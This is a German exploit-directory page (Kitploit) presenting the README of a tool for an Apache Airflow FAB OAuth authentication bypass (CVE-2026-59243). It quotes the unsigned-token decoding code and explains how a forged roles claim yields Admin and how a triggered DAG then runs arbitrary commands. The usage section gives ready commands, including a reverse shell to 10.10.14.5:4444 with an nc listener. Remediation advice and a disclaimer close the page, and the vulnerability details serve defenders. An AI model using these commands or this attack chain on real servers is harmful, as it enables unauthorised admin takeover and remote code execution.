Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-59243_exploit — Exploit für die Apache Airflow FAB OAuth-Authentifizierungsumgehung (CVE-2026-59243), der Administratorzugriff und Remote-Codeausführung ermöglicht, indem ein präparierter DAG über die REST-API ausgelöst wird. | Kitploit
Tools/GitHubGitHub/0xdak/cve-2026-59243_exploit
Authentifizierung & AutorisierungExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingAPI-Sicherheit
GitHub0xdak/cve-2026-59243_exploit

CVE-2026-59243_exploit

Exploit für die Apache Airflow FAB OAuth-Authentifizierungsumgehung (CVE-2026-59243), der Administratorzugriff und Remote-Codeausführung ermöglicht, indem ein präparierter DAG über die REST-API ausgelöst wird.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
5vor 1 MonatNoch nicht geprüft

CVE-2026-59243 — Apache Airflow FAB Provider OAuth Authentifizierungs-Bypass → DAG RCE

Authentifizierungs-Bypass im FAB-Auth-Manager-Provider von Apache Airflow (apache-airflow-providers-fab), der über einen ausgelösten DAG zu Remote-Codeausführung führt.

Der Provider dekodiert das Azure OAuth id_token standardmäßig mit deaktivierter Signaturprüfung (airflow/providers/fab/auth_manager/security_manager/override.py, _decode_and_validate_azure_jwt):

root@kitploit:~
verify_signature = self.oauth_remotes["azure"].client_kwargs.get("verify_signature", False)
if verify_signature:
    ...                                            # JWKS validation (only if explicitly enabled)
_parts = id_token.split(".")
_payload = _parts[1] + "=" * (-len(_parts[1]) % 4)
return json.loads(base64.urlsafe_b64decode(_payload))   # raw payload, NO signature check

Die Claims werden direkt auf die Identität abgebildet — oid → Benutzername, roles → role_keys — und AUTH_ROLES_MAPPING wandelt einen roles=["Azure-Admins"]-Claim in die Rolle Admin um. Da Signatur/Aussteller/Zielgruppe des Tokens nie geprüft werden (CWE-347), authentifiziert sich ein Angreifer, der den OAuth-Ablauf abschließt, als Admin ohne echte Anmeldedaten. Ein Admin kann dann einen DAG auslösen, der beliebige Befehle ausführt.

  • Betroffen: apache-airflow-providers-fab < 3.7.3 (mit apache-airflow >= 3.0.2)
  • Behoben: 3.7.3 (Standard auf verify_signature=True umgestellt; Token wird gegen Microsofts JWKS validiert)
  • CWE: 347 (Improper Verification of Cryptographic Signature)
  • Standardport: 8080 (Airflow-UI + REST-API)
  • Auswirkung: nicht authentifizierter Admin-Zugriff → RCE über eine DAG-Aufgabe (als Airflow-Worker-Benutzer)

Anforderungen

Nur Python-3-Standardbibliothek. Das Ziel muss den FAB-Auth-Manager mit dem verwundbaren Azure-OAuth-Provider konfiguriert haben und (für den RCE-Schritt) einen DAG, dessen Aufgabe das vom Angreifer kontrollierte dag_run.conf ausführt.

Verwendung

root@kitploit:~
python3 exploit.py http://target:8080/ -c 'id > /tmp/pwned'
python3 exploit.py http://target:8080/ --shell 10.10.14.5:4444   # nc -lvnp 4444 first

Funktionsweise

  1. Auth-Bypass — den OAuth-Ablauf (GET /auth/login/azure → IdP → /auth/oauth-authorized/azure) mit einem Cookie-Jar durchlaufen. FAB akzeptiert das unsignierte/gefälschte id_token und meldet sich als Admin an, wobei ein session-Cookie und ein _token-Cookie gesetzt werden (das JWT, das die REST-API erwartet).
  2. RCE — POST /api/v2/dags/<dag>/dagRuns (Bearer _token) mit {"conf":{"cmd":"..."}} löst einen DAG aus, dessen BashOperator dag_run.conf['cmd'] ausführt. Verwende pro Lauf ein eindeutiges logical_date (das Paar (dag_id, logical_date) ist in der Metadaten-DB eindeutig).

Das Tool schreibt außerdem den Loopback-Host im OAuth-authorize-Redirect auf das Ziel um, sodass es gegen ein entferntes Ziel funktioniert, dessen IdP in der Serverkonfiguration als 127.0.0.1 angegeben ist.

Hinweis

Dies nutzt den Token-Überprüfungsfehler aus. Um Admin zu erreichen, muss der OAuth-Ablauf ein Token mit einem erhöhten roles-Claim liefern — trivial, wenn IdP/Token beeinflusst werden können, da Airflow die Signatur nie überprüft. Der RCE-Schritt setzt einen DAG voraus, der dag_run.conf ausführt (ein häufiges Muster); andernfalls kann der Admin-Zugriff über andere Airflow-Funktionen ausgenutzt werden.

Behebung

Aktualisiere apache-airflow-providers-fab auf ≥ 3.7.3; ordne extern behauptete OAuth-Rollenclaims niemals direkt Admin zu; führe Airflow nicht als Root aus; halte die UI/API von nicht vertrauenswürdigen Netzwerken fern.

Haftungsausschluss

Nur für autorisierte Sicherheitstests und Schulungszwecke. Verwende es nur gegen Systeme, die dir gehören oder für die du eine ausdrückliche Testgenehmigung hast.

Tool herunterladen